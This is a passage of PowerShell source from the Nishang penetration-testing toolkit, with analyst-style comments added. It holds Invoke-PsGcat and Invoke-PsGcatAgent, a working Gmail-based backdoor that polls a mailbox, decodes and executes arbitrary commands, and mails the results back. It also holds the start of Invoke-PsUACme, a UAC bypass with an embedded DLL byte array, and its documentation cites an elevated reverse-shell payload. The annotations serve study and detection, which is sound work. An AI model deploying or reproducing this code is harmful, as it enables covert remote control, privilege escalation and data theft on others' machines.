        # Note: PowerShell variable names are case-insensitive, so $smtpserver /
        # $smtpServer and $username / $Username refer to the same variables.
        $smtpserver = "smtp.gmail.com"
        $msg = new-object Net.Mail.MailMessage
        $smtp = new-object Net.Mail.SmtpClient($smtpServer )
        $smtp.EnableSsl = $True
        # Plain username/password credential; the password is held in a plain
        # string for the lifetime of the function.
        $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password");
        # Sender and recipient are the same mailbox.
        $msg.From = "$username@gmail.com"
        $msg.To.Add("$username@gmail.com")
        $msg.Subject = "Command"
        $msg.Body = "##" + $Compressed
        $smtp.Send($msg)
        Write-Output "Command sent to $username@gmail.com"
    }
    catch
    {
        # Best-effort diagnostics; the exception record itself is also emitted.
        Write-Warning "Something went wrong! Check if Username/Password are correct and you can connect to gmail from insecure apps."
        Write-Error $_
    }
}
6387
function ReadResponse
{
    # Nested helper of Invoke-PsGcat: opens a TLS IMAP session to Gmail, logs
    # in with $Username/$Password from the enclosing scope, searches INBOX for
    # messages whose subject contains "Output" and writes the fetched body text
    # of the last match to the output stream. Takes no parameters.
    #
    # Note: this function defines an inner function with the SAME name; every
    # ReadResponse call below the inner definition invokes the inner one.
    #
    # Observable artifacts: TCP/TLS connection to imap.gmail.com:993 from the
    # PowerShell process, IMAP SEARCH SUBJECT "Output".
    try
    {
        $tcpClient = New-Object -TypeName System.Net.Sockets.TcpClient

        # Connect to gmail
        # The client is never closed in this function.
        $tcpClient.Connect("imap.gmail.com", 993)

        if($tcpClient.Connected)
        {
            # Create new SSL Stream for tcpClient
            # (the cast wraps the NetworkStream in an SslStream; no validation
            # callback is supplied, so presumably the default certificate
            # validation applies — confirm)
            [System.Net.Security.SslStream] $sslStream = $tcpClient.GetStream()

            # Authenticating as client
            $sslStream.AuthenticateAsClient("imap.gmail.com");

            if($sslStream.IsAuthenticated)
            {
                # Assigned the writer to stream
                # ($sw and $reader are created here but not used afterwards
                # in this function; raw stream reads/writes are used instead)
                [System.IO.StreamWriter] $sw = $sslstream

                # Assigned reader to stream
                [System.IO.StreamReader] $reader = $sslstream
                $script:result = ""
                $sb = New-Object System.Text.StringBuilder
                $mail =""
                # Shared 2048-byte read buffer, reused by every read below.
                $responsebuffer = [Array]::CreateInstance("byte", 2048)


                # Inner helper (shadows the outer name): sends $command when it
                # is non-empty, performs one read of up to 2048 bytes and emits
                # the decoded buffer. If the reply is a "* SEARCH" result it
                # FETCHes the last listed message and emits its body.
                function ReadResponse ($command)
                {
                    $sb = New-Object System.Text.StringBuilder
                    if ($command -ne "")
                    {
                        $buf = [System.Text.Encoding]::ASCII.GetBytes($command)
                        $sslStream.Write($buf, 0, $buf.Length)
                    }
                    $sslStream.Flush()
                    # $bytes (the count actually read) is never used: the whole
                    # buffer is decoded, so bytes left over from an earlier
                    # read can reappear in this reply.
                    $bytes = $sslStream.Read($responsebuffer, 0, 2048)
                    $str = $sb.Append([System.Text.Encoding]::ASCII.GetString($responsebuffer))
                    # Raw reply text goes to the pipeline (this is the "return").
                    $sb.ToString()
                    $temp = $sb.ToString() | Select-String "\* SEARCH"
                    if ($temp)
                    {
                        # Last number on the "* SEARCH n m ..." line = newest match.
                        $fetch = $temp.ToString() -split "\$",2
                        $tmp = $fetch[0] -split "\* SEARCH " -split " " -replace "`n"
                        [int]$mail = $tmp[-1]
                        # NOTE(review): "f(a, b)" in PowerShell passes ONE array
                        # argument, so $command is a two-element array in the
                        # recursive call — presumably unintended; confirm.
                        $cmd = ReadResponse("$ FETCH $mail BODY[TEXT]`r`n", "1")
                        # Strip every '=' from each emitted element (looks like
                        # quoted-printable soft-break cleanup — assumption).
                        $cmd -replace '='
                    }
                }
                # "$ " is a literal tag prefix here (a lone "$" is not expanded).
                # Greeting, then LOGIN carrying the password inside the TLS
                # session, SELECT, SEARCH (its output is the function's result),
                # LOGOUT.
                ReadResponse ""
                ReadResponse ("$ LOGIN " + "$Username@gmail.com" + " " + "$Password" + " `r`n") | Out-Null
                ReadResponse("$ SELECT INBOX`r`n") | Out-Null
                ReadResponse("$ SEARCH SUBJECT `"Output`"`r`n")
                ReadResponse("$ LOGOUT`r`n") | Out-Null
            }
            else
            {
                Write-Error "You were not authenticated. Quitting."
            }
        }
        else
        {
            Write-Error "You are not connected to the host. Quitting"
        }
    }

    catch
    {
        Write-Warning "Something went wrong! Check if Username/Password are correct, you can connect to gmail from insecure apps and if there is output email in the inbox"
        Write-Error $_
    }
}
6463
6464 #For only reading the output.
6465 if ($GetOutput)
6466 {
6467 Write-Verbose "Reading Output from Gmail"
6468 ReadResponse ""
6469 }
6470 #Non interactive
6471 elseif ($NonInteractive)
6472 {
6473 #If Scriptpath is provided, read the script.
6474 if ($ScriptPath)
6475 {
6476 $Payload = [IO.File]::ReadAllText("$ScriptPath") -replace "`n"
6477 Write-Verbose "Sending Payload to $Username@gmail.com $Payload"
6478 SendCommand $Payload $Username $Password
6479 }
6480 #else use the command
6481 else
6482 {
6483 Write-Verbose "Sending Payload to $Username@gmail.com $Payload"
6484 SendCommand $Payload $Username $Password
6485 }
6486
6487 }
6488 #Interactive prompt
6489 else
6490 {
6491 while($Payload -ne "exit")
6492 {
6493
6494 Write-Output "Use GetOutput to get output."
6495 Write-Output "Use Script to specify a script."
6496 $Payload = Read-Host -Prompt "PsGcat"
6497 if ($Payload -eq "GetOutput")
6498 {
6499 Write-Verbose "Reading Output from Gmail"
6500 ReadResponse ""
6501 }
6502 if ($Payload -eq "Script")
6503 {
6504 $path = Read-Host -Prompt "Provide complete path to the PowerShell script."
6505 $Payload = [IO.File]::ReadAllText("$path") -replace "`n"
6506 Write-Verbose "Sending Payload to $Username@gmail.com $Payload"
6507 SendCommand $Payload $Username $Password
6508 }
6509 else
6510 {
6511 Write-Verbose "Sending Payload to $Username@gmail.com $Payload"
6512 SendCommand $Payload $Username $Password
6513 }
6514 }
6515 }
6516}
6517
6518########################################## Invoke-PsGcatAgent needs to be run on target machine ########################
function Invoke-PsGcatAgent
{
<#
.SYNOPSIS
Nishang script which can be used to execute commands and scripts from Gmail uploaded by Invoke-PSGcat.

.DESCRIPTION
This script is capable of executing commands and/or scripts from Gmail and send the output back.
A valid Gmail username and password is required.
This script must be executed on the target and commands should be uploaded by Invoke-PsGcat on attacker's machine.

In the Gmail security settings of that account "Access for less secure apps" must be turned on. Make sure that you use
a throw away account.

Script execution is not very reliable right now and you may see the agent struggling to pull a big encoded script.

.PARAMETER Username
Username of the Gmail account you want to use.

.PARAMETER Password
Password of the Gmail account you want to use.

.PARAMETER AgentID
AgentID is currently unused and would be used with multiple agent support in future.

.PARAMETER Delay
Delay in seconds after a successful execution. Default is 60.

.EXAMPLE
PS > Invoke-PSGcatAgent -Username psgcatlite -password pspassword -Delay 10
Pull latest command/script from Gmail and execute with a delay of 10 seconds.

.LINK
http://www.labofapenetrationtester.com/2015/04/pillage-the-village-powershell-version.html
https://github.com/samratashok/nishang
#>

    # Behaviour summary (for analysts): polls the mailbox over IMAP/TLS
    # (imap.gmail.com:993) in an endless loop, takes the newest INBOX message
    # whose subject contains "Command", Base64-decodes and Deflate-decompresses
    # the text after the "##" marker and runs it with Invoke-Expression, then
    # mails the output back over SMTP (smtp.gmail.com) with the subject
    # "Output from <computer name>". The SEARCH filters on subject only — there
    # is no sender, signature or integrity check on the message that is run.
    # Static artifacts: the two hostnames, subject "Command", the "##" marker,
    # subject "Output from ...", and a periodic connection every $Delay seconds.

    [CmdletBinding()] Param(

        [Parameter(Position = 0, Mandatory = $false)]
        [String]
        $Username,

        [Parameter(Position = 1, Mandatory = $false)]
        [String]
        $Password,

        [Parameter(Position = 2, Mandatory = $false)]
        [String]
        $AgentID,

        # Declared [String]; Start-Sleep -Seconds coerces it to an integer.
        [Parameter(Position = 3, Mandatory = $false)]
        [String]
        $Delay = 60
    )


    # Suppresses non-terminating errors for the rest of the function
    # (including the nested helper); terminating ones reach the catch below.
    $ErrorActionPreference = "SilentlyContinue"

    # Never exits on its own. Each pass opens a fresh connection, runs one
    # IMAP session and sleeps; errors are echoed and the loop continues.
    while ($true)
    {
        try
        {

            #Basic IMAP interaction from http://learningpcs.blogspot.in/2012/01/powershell-v2-read-gmail-more-proof-of.html
            $tcpClient = New-Object -TypeName System.Net.Sockets.TcpClient

            # Connect to gmail
            # The client is never explicitly closed, so each iteration leaves
            # its socket to be cleaned up by the runtime.
            $tcpClient.Connect("imap.gmail.com", 993)
            if($tcpClient.Connected)
            {
                # Create new SSL Stream for tcpClient
                # (the cast wraps the NetworkStream in an SslStream; no
                # validation callback is supplied, so presumably the default
                # certificate validation applies — confirm)
                [System.Net.Security.SslStream] $sslStream = $tcpClient.GetStream()

                # Authenticating as client
                $sslStream.AuthenticateAsClient("imap.gmail.com");
                $script:result = ""
                $sb = New-Object System.Text.StringBuilder
                $mail =""
                # Shared 2048-byte read buffer, reused by every read below.
                $responsebuffer = [Array]::CreateInstance("byte", 2048)

                #Send IMAP commands and read response
                # Nested helper: writes $command (when non-empty) to the TLS
                # stream, reads once (up to 2048 bytes) and emits both the
                # command and the decoded buffer to the pipeline. $ReturnResult
                # is never read. When the reply is a "* SEARCH" result it also
                # fetches, decodes, EXECUTES the message payload and mails the
                # result back.
                function ReadResponse ($command, $ReturnResult)
                {
                    $sb = New-Object System.Text.StringBuilder
                    if ($command -ne "")
                    {
                        # Echoes the raw command to the output stream — for the
                        # LOGIN call this includes the password, so console
                        # capture / transcripts will contain it.
                        $command
                        $buf = [System.Text.Encoding]::ASCII.GetBytes($command)
                        $sslStream.Write($buf, 0, $buf.Length)
                    }
                    $sslStream.Flush()
                    # $bytes (the count actually read) is never used: the whole
                    # buffer is decoded, so bytes left over from an earlier read
                    # can reappear in this reply.
                    $bytes = $sslStream.Read($responsebuffer, 0, 2048)
                    $str = $sb.Append([System.Text.Encoding]::ASCII.GetString($responsebuffer))
                    # Raw reply text goes to the pipeline.
                    $sb.ToString()

                    #Select the output of SEARCH IMAP command
                    $temp = $sb.ToString() | Select-String "\* SEARCH"
                    if ($temp)
                    {
                        # Last number on the "* SEARCH n m ..." line = newest match.
                        $fetch = $temp.ToString() -split "\$",2
                        $tmp = $fetch[0] -split "\* SEARCH " -split " " -replace "`n"
                        [int]$mail = $tmp[-1]

                        #FETCH the body of the last email which matches the SEARCH criteria
                        # NOTE(review): "f(a, b)" in PowerShell passes ONE array
                        # argument, so $command is a two-element array in this
                        # call; the echo above then yields two pipeline items,
                        # which is presumably why index [2] below is the reply
                        # text — fragile; confirm.
                        $cmd = ReadResponse("$ FETCH $mail BODY[TEXT]`r`n", "1")
                        $tmp = $cmd[2] -split "\)",2 -replace "`n"
                        # Payload = text after the "##" marker. "=3D" -> "=" and
                        # the removal of '=' outside trailing padding look like
                        # quoted-printable cleanup (assumption).
                        $TempCommand = ($tmp[0] -split "##",2)[1] -replace "(?<=\=)3D" -replace "`r"
                        $EncCommand = $TempCommand -replace '(?!={1,2}$)=','' -replace "`r"
                        Write-Verbose "Executing Encoded Command $EncCommand"
                        #Decode
                        # Base64 -> Deflate-compressed bytes -> script text
                        $dec = [System.Convert]::FromBase64String($EncCommand)
                        $ms = New-Object System.IO.MemoryStream
                        $ms.Write($dec, 0, $dec.Length)
                        $ms.Seek(0,0) | Out-Null
                        $cs = New-Object System.IO.Compression.DeflateStream ($ms, [System.IO.Compression.CompressionMode]::Decompress)
                        $sr = New-Object System.IO.StreamReader($cs)
                        $cmd = $sr.readtoend()
                        # Arbitrary code execution: the mailbox content is run as
                        # PowerShell in this process, with errors suppressed.
                        $result = Invoke-Expression $cmd -ErrorAction SilentlyContinue

                        #Send results to gmail
                        #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
                        # Same mailbox as sender and recipient; plain credential.
                        $smtpserver = "smtp.gmail.com"
                        $msg = new-object Net.Mail.MailMessage
                        $smtp = new-object Net.Mail.SmtpClient($smtpServer )
                        $smtp.EnableSsl = $True
                        $smtp.Credentials = New-Object System.Net.NetworkCredential("$Username", "$Password");
                        $msg.From = "$Username@gmail.com"
                        $msg.To.Add("$Username@gmail.com")
                        # The host name is disclosed in the subject line.
                        $msg.Subject = "Output from $env:Computername"
                        $msg.Body = $result
                        $smtp.Send($msg)
                    }
                }

                #Interact with Gmail using IMAP
                # "$ " is a literal tag prefix here (a lone "$" is not expanded).
                # Greeting, LOGIN (password sent inside the TLS session), SELECT,
                # SEARCH (this call triggers fetch/execute), LOGOUT, then sleep.
                ReadResponse ""
                ReadResponse ("$ LOGIN " + "$Username@gmail.com" + " " + "$Password" + " `r`n") | Out-Null
                ReadResponse("$ SELECT INBOX`r`n") | Out-Null
                ReadResponse("$ SEARCH SUBJECT `"Command`"`r`n")
                ReadResponse("$ LOGOUT`r`n") | Out-Null
                Start-Sleep -Seconds $Delay

            }

            else
            {
                # Despite the message, the loop is not left: the next
                # iteration reconnects immediately (no sleep on this path).
                Write-Error "You are not connected to the host. Quitting"
            }

        }
        catch
        {
            # Error record is emitted to the output stream; the loop continues.
            $_
        }
    }
}
6676
6677
6678
6679
6680
6681
6682######################################### Invoke-PsUACme ###############################################################
6683function Invoke-PsUACme
6684{
6685<#
6686.SYNOPSIS
6687Nishang script which uses known methods to bypass UAC.
6688
6689.DESCRIPTION
6690This script implements methods from UACME project (https://github.com/hfiref0x/UACME) to bypass UAC on Windows machines.
6691It drops DLLs in the known misconfigured/vulnerable locations of Windows machines using Wusa.exe and executes built-in executables
6692to bypass UAC. Following methods (named mostly on the basis of executables used) are implemented: "sysprep","oobe","ActionQueue",
6693"migwiz","cliconfg","winsat" and "mmc"
6694
6695The DLLs dropped by the script is a modified version of Fubuki from the UACME project. It needs separate DLLs for 64 bit and 32 bit machines.
6696It is able to determine the bit-ness of the process from which it is called and uses the apt DLL.
6697
6698The script drops cmd.bat in the C:\Windows\Temp directory and it is this batch file which is called from the DLL. Everything provided
6699to the Payload parameter ends up in this batch file.
6700
6701Wusa.exe on Windows 10 has no "extract" option. Therefore, Invoke-PsUACme does not work on Windows 10 currently.
6702A clean up is done by the script after payload execution. But the DLLs dropped in secure locations must be removed manually.
6703The script must be run from a process running with medium integrity.
6704
6705.PARAMETER Payload
6706Payload to be executed from the elevated process. The default one checks whether the elevation was successful.
6707
6708.PARAMETER method
6709The method to be used for elevation. The default one is sysprep.
6710
6711.PARAMETER PayloadPath
6712The path to the payload. The default one is C:\Windows\temp\cmd.bat. To change this, change the path in DLL as well.
6713
6714.PARAMETER CustomDLL64
6715Path to a custom 64 bit DLL.
6716
6717.PARAMETER CustomDLL32
6718Path to a custom 32 bit DLL.
6719
6720.PARAMETER $DllBytes64
6721Default 64 bit DLL hard coded in the script. It is slightly modified Fubuki DLL from the UACME project.
6722
6723.PARAMETER $DllBytes32
6724Default 32 bit DLL hard coded in the script. It is slightly modified Fubuki DLL from the UACME project.
6725
6726.EXAMPLE
6727PS > Invoke-PsUACme -Verbose
6728Above command runs the sysprep method and the default payload.
6729
6730.EXAMPLE
6731PS > Invoke-PsUACme -method oobe -Verbose
6732Above command runs the oobe method and the default payload.
6733
6734.EXAMPLE
6735PS > Invoke-PsUACme -method oobe -Payload "powershell -windowstyle hidden -e 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"
6736Above command runs the oobe method and the specified payload. The payload in this case is the one liner PowerShell reverse shell
6737(Shells directory of Nishang) which is base64 encoded using the Invoke-Encode (with the -OutCommand parameter) script from the
6738Utility directory of Nishang.
6739
6740The reverse shell in above case runs with elevated privileges.
6741
6742.LINK
6743http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html
6744https://github.com/samratashok/nishang
6745#>
6746
6747
6748 [CmdletBinding()] Param(
6749
6750 [Parameter(Position = 0, Mandatory = $False)]
6751 [String]
6752 $Payload = 'powershell.exe -noexit -c "if ([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match ''S-1-5-32-544'')) {Write-Output ''You have elevated/Administrator rights!''}"',
6753
6754 [Parameter(Position = 1, Mandatory = $False)]
6755 [ValidateSet("sysprep","oobe","ActionQueue","migwiz","cliconfg","winsat","mmc")]
6756 [String]
6757 $method = "sysprep",
6758
6759 [Parameter(Position = 2, Mandatory = $False)]
6760 [String]
6761 $PayloadPath = "C:\Windows\temp\cmd.bat",
6762
6763 [Parameter(Position = 3, Mandatory = $False)]
6764 [String]
6765 $CustomDll64,
6766
6767 [Parameter(Position = 4, Mandatory = $False)]
6768 [String]
6769 $CustomDll32,
6770
6771 [Parameter(Position = 5, Mandatory = $False)]
6772 [String]
6773 $DllBytes64 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 232 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 53 114 7 185 113 19 105 234 113 19 105 234 113 19 105 234 172 236 162 234 116 19 105 234 113 19 104 234 124 19 105 234 131 74 97 235 123 19 105 234 131 74 105 235 112 19 105 234 131 74 150 234 112 19 105 234 113 19 254 234 112 19 105 234 131 74 107 235 112 19 105 234 82 105 99 104 113 19 105 234 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 100 134 4 0 250 130 9 86 0 0 0 0 0 0 0 0 240 0 34 32 11 2 14 0 0 4 0 0 0 16 0 0 0 0 0 0 168 17 0 0 0 16 0 0 0 0 0 128 1 0 0 0 0 16 0 0 0 2 0 0 6 0 0 0 6 0 0 0 6 0 0 0 0 0 0 0 0 80 0 0 0 4 0 0 19 147 0 0 2 0 96 1 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 16 0 0 0 176 34 0 0 148 3 0 0 68 38 0 0 60 0 0 0 0 64 0 0 224 4 0 0 0 48 0 0 24 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 33 0 0 56 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 120 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 52 3 0 0 0 16 0 0 0 4 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 242 7 0 0 0 32 0 0 0 8 0 0 0 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 112 100 97 116 97 0 0 24 0 0 0 0 48 0 0 0 2 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 4 0 0 0 64 0 0 0 6 0 0 0 18 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 194 0 0 204 72 137 92 36 24 85 86 87 72 141 108 36 185 72 129 236 224 0 0 0 51 246 72 141 69 111 72 33 117 111 72 141 21 87 16 0 0 33 117 103 65 185 25 0 2 0 69 51 192 72 137 68 36 32 72 199 193 1 0 0 128 255 21 193 15 0 0 133 192 15 133 67 1 0 0 72 139 77 111 72 133 201 15 132 54 1 0 0 72 141 69 103 69 51 201 72 137 68 36 40 72 141 21 49 16 0 0 72 33 116 36 32 69 51 192 255 21 147 15 0 0 133 192 15 133 13 1 0 0 139 125 103 255 199 255 21 208 15 0 0 68 139 199 141 86 8 72 139 200 255 21 137 15 0 0 72 139 216 72 133 192 15 132 231 0 0 0 72 139 77 111 72 141 69 103 72 137 68 36 40 72 141 21 225 15 0 0 69 51 201 72 137 92 36 32 69 51 192 255 21 64 15 0 0 133 192 15 133 136 0 0 0 72 141 13 217 15 0 0 255 21 99 15 0 0 72 139 203 255 21 90 15 0 0 141 86 104 51 192 139 202 72 141 125 215 243 170 72 141 125 183 137 85 215 141 78 24 243 170 72 141 77 215 255 21 87 15 0 0 72 141 69 183 69 51 201 72 137 68 36 72 69 51 192 72 141 69 215 72 139 211 72 137 68 36 64 51 201 72 33 116 36 56 72 33 116 36 48 33 116 36 40 33 116 36 32 255 21 250 14 0 0 139 240 133 192 116 20 72 139 77 183 255 21 226 14 0 0 72 139 77 191 255 21 216 14 0 0 255 21 250 14 0 0 76 139 195 51 210 72 139 200 255 21 228 14 0 0 72 139 77 111 255 21 154 14 0 0 72 141 21 251 14 0 0 72 199 193 1 0 0 128 255 21 110 14 0 0 139 198 72 139 156 36 16 1 0 0 72 129 196 224 0 0 0 95 94 93 195 204 72 137 92 36 8 72 137 124 36 16 85 72 141 172 36 0 250 255 255 72 129 236 0 7 0 0 184 1 0 0 0 59 208 15 133 80 1 0 0 72 141 13 10 15 0 0 255 21 108 14 0 0 232 35 254 255 255 51 219 133 192 15 133 43 1 0 0 141 83 104 139 202 72 
141 124 36 112 243 170 72 141 124 36 80 137 84 36 112 141 75 24 243 170 72 141 76 36 112 255 21 88 14 0 0 51 192 72 141 125 224 185 10 2 0 0 72 141 85 224 243 170 72 141 13 240 14 0 0 65 184 4 1 0 0 255 21 28 14 0 0 255 200 61 2 1 0 0 15 135 213 0 0 0 51 192 72 141 189 240 1 0 0 185 16 4 0 0 243 170 15 183 77 224 72 141 133 240 1 0 0 102 133 201 116 30 72 141 85 224 72 141 189 240 1 0 0 72 43 215 102 137 8 72 131 192 2 15 183 12 2 102 133 201 117 240 102 137 24 72 141 133 240 1 0 0 102 57 157 240 1 0 0 116 9 72 131 192 2 102 57 24 117 247 72 141 13 158 14 0 0 186 99 0 0 0 72 43 200 102 137 16 72 141 64 2 15 183 20 1 102 133 210 117 240 102 137 24 72 141 141 240 1 0 0 72 141 68 36 80 69 51 201 72 137 68 36 72 69 51 192 72 141 68 36 112 51 210 72 137 68 36 64 72 141 69 224 72 137 68 36 56 72 137 92 36 48 137 92 36 40 137 92 36 32 255 21 68 13 0 0 133 192 116 22 72 139 76 36 80 255 21 45 13 0 0 72 139 76 36 88 255 21 34 13 0 0 51 201 255 21 18 13 0 0 204 76 141 156 36 0 7 0 0 73 139 91 16 73 139 123 24 73 139 227 93 195 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 198 39 0 0 0 0 0 0 182 39 0 0 0 0 0 0 162 39 0 0 0 0 0 0 214 39 0 0 0 0 0 0 0 0 0 0 0 0 0 0 86 39 0 0 0 0 0 0 98 39 0 0 0 0 0 0 72 39 0 0 0 0 0 0 130 39 0 0 0 0 0 0 50 39 0 0 0 0 0 0 22 39 0 0 0 0 0 0 10 39 0 0 0 0 0 0 112 39 0 0 0 0 0 0 248 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 83 0 111 0 102 0 116 0 119 0 97 0 114 0 101 0 92 0 65 0 107 0 97 0 103 0 105 0 0 0 0 0 76 0 111 0 118 0 101 0 76 0 101 0 116 0 116 0 101 0 114 0 0 0 0 0 65 0 107 0 97 0 103 0 105 0 32 0 108 0 101 0 116 0 116 0 101 0 114 0 32 0 102 0 111 0 117 0 110 0 100 0 0 0 0 0 70 0 
117 0 98 0 117 0 107 0 105 0 32 0 97 0 116 0 32 0 121 0 111 0 117 0 114 0 32 0 115 0 101 0 114 0 118 0 105 0 99 0 101 0 46 0 13 0 10 0 0 0 0 0 0 0 37 0 115 0 121 0 115 0 116 0 101 0 109 0 114 0 111 0 111 0 116 0 37 0 92 0 116 0 101 0 109 0 112 0 92 0 0 0 0 0 99 0 109 0 100 0 46 0 98 0 97 0 116 0 0 0 0 0 0 0 250 130 9 86 0 0 0 0 13 0 0 0 252 0 0 0 136 33 0 0 136 9 0 0 0 0 0 0 250 130 9 86 0 0 0 0 14 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 71 67 84 76 0 16 0 0 52 3 0 0 46 116 101 120 116 36 109 110 0 0 0 0 0 32 0 0 120 0 0 0 46 105 100 97 116 97 36 53 0 0 0 0 128 32 0 0 8 1 0 0 46 114 100 97 116 97 0 0 136 33 0 0 252 0 0 0 46 114 100 97 116 97 36 122 122 122 100 98 103 0 0 0 132 34 0 0 40 0 0 0 46 120 100 97 116 97 0 0 176 34 0 0 148 3 0 0 46 101 100 97 116 97 0 0 68 38 0 0 40 0 0 0 46 105 100 97 116 97 36 50 0 0 0 0 108 38 0 0 20 0 0 0 46 105 100 97 116 97 36 51 0 0 0 0 128 38 0 0 120 0 0 0 46 105 100 97 116 97 36 52 0 0 0 0 248 38 0 0 250 0 0 0 46 105 100 97 116 97 36 54 0 0 0 0 0 48 0 0 24 0 0 0 46 112 100 97 116 97 0 0 0 64 0 0 160 0 0 0 46 114 115 114 99 36 48 49 0 0 0 0 160 64 0 0 64 4 0 0 46 114 115 114 99 36 48 50 0 0 0 0 1 20 7 0 20 52 34 0 20 1 28 0 8 112 7 96 6 80 0 0 1 26 7 0 26 116 227 0 26 52 226 0 26 1 224 0 11 80 0 0 0 0 0 0 0 0 0 0 250 130 9 86 0 0 0 0 240 35 0 0 1 0 0 0 28 0 0 0 28 0 0 0 216 34 0 0 72 35 0 0 184 35 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 253 35 0 0 20 36 0 0 42 36 0 0 52 36 0 0 62 36 0 0 89 36 0 0 117 36 0 0 144 36 0 0 163 36 0 0 184 36 0 0 202 36 0 0 222 36 0 0 243 36 0 0 15 37 0 0 34 37 0 0 58 37 0 0 77 37 0 0 104 37 0 0 124 37 0 0 145 37 0 0 172 37 0 0 198 37 0 0 210 37 0 0 232 37 0 0 246 37 0 0 17 38 0 0 35 38 0 0 55 38 0 0 0 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 8 0 9 0 10 0 11 0 12 0 13 0 14 0 15 0 16 0 17 0 18 0 19 0 20 0 21 0 22 0 
23 0 24 0 25 0 26 0 27 0 70 117 98 117 107 105 54 52 46 100 108 108 0 67 97 108 108 78 116 80 111 119 101 114 73 110 102 111 114 109 97 116 105 111 110 0 67 111 110 115 116 114 117 99 116 80 97 114 116 105 97 108 77 115 103 86 87 0 67 114 101 97 116 101 85 114 105 0 67 117 114 114 101 110 116 73 80 0 68 101 118 79 98 106 67 114 101 97 116 101 68 101 118 105 99 101 73 110 102 111 76 105 115 116 0 68 101 118 79 98 106 68 101 115 116 114 111 121 68 101 118 105 99 101 73 110 102 111 76 105 115 116 0 68 101 118 79 98 106 69 110 117 109 68 101 118 105 99 101 73 110 116 101 114 102 97 99 101 115 0 68 101 118 79 98 106 71 101 116 67 108 97 115 115 68 101 118 115 0 68 101 118 79 98 106 79 112 101 110 68 101 118 105 99 101 73 110 102 111 0 68 108 108 82 101 103 105 115 116 101 114 83 101 114 118 101 114 0 71 101 110 101 114 97 116 101 65 99 116 105 111 110 81 117 101 117 101 0 80 111 119 101 114 71 101 116 65 99 116 105 118 101 83 99 104 101 109 101 0 80 114 105 118 97 116 101 67 111 73 110 116 101 114 110 101 116 67 111 109 98 105 